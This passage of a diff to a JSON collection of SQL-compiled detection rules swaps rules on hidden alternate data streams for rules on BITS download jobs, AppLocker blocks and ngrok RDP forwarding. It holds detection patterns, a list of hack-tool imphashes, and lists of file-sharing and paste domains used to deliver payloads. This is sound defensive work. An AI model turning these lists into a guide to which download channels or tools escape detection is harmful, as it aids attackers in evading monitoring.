"title": "Creation Of a Suspicious ADS File Outside a Browser Download", - "id": "573df571-a223-43bc-846e-3f98da481eca", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", "status": "experimental", - "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", - "author": "frack113", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Other legitimate browsers not currently included in the filter (please add them)", - "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE '%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_creation_internet_file.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", + "title": "New BITS Job Created Via PowerShell", + "id": "fe3a2d49-f255-4d10-935c-bda7391108eb", "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new bits job by PowerShell", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "Administrator PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '3' AND (processPath LIKE '%\\\\powershell.exe' ESCAPE '\\' OR processPath LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_bits_client_new_job_via_powershell.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "Hidden Executable In NTFS Alternate Data Stream", - "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", - "status": "test", - "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", - "author": "Florian Roth (Nextron Systems), @0xrawsec", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "create_stream_hash_ads_executable.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Unusual File Download From File Sharing Websites", - "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "title": "BITS Transfer Job With Uncommon Or Suspicious Remote TLD", + "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.persistence", + "attack.t1197" ], "falsepositives": [ - "Unknown" + "This rule doesn't exclude other known TLDs such as \".org\" or \".net\". It's recommended to apply additional filters for software and scripts that leverage the BITS service" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT (((RemoteName LIKE '%.azureedge.net/%' ESCAPE '\\' OR RemoteName LIKE '%.com/%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms/%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org/%' ESCAPE '\\'))))" ], - "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" + "filename": "win_bits_client_new_transfer_via_uncommon_tld.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "title": "File Was Not Allowed To Run", + "id": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "description": "Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.", + "author": "Pushkarev Dmitry", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1204.002", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.006", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Need tuning applocker or add exceptions in SIEM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-AppLocker/MSI and Script', 'Microsoft-Windows-AppLocker/EXE and DLL', 'Microsoft-Windows-AppLocker/Packaged app-Deployment', 'Microsoft-Windows-AppLocker/Packaged app-Execution') AND EventID IN ('8004', '8007', '8022', '8025'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_applocker_file_was_not_allowed_to_run.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents 